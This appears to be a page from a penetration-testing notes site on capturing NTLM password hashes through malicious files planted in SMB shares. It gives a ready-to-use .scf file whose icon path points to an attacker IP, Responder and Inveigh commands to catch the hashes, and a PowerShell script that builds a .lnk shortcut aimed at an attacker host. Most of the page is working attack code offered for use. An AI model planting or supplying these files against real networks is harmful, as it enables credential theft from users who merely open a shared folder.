smb-scf-and-ink-file

Put a malicious file in the smb share

@ appears on top (Put in filename as a first character)

@inventry.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

Capture hashes

Responder:

sudo responder -wrf -v -I tun0

Inveigh:

Import-Module .\Inveight.ps1

Invoke-Inveigh -ConsoleOutput Y -FileOutput Y

~~InveighZero~~

As soon as a user browser SMB shares, we will get password hash

Sudo responder -wrf -v -I tun0

Use `.ink` file to capture hash

Generate .ink file: https://github.com/dievus/lnkbomb

Create a malicious desktop.ink icon:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Previousservice-permission NextSplunk universal forwarder exploit

Last updated 1 day ago

hashtagSCF on a file share (capture hashes)

hashtagUse .ink file to capture hash

SCF on a file share (capture hashes)

Use `.ink` file to capture hash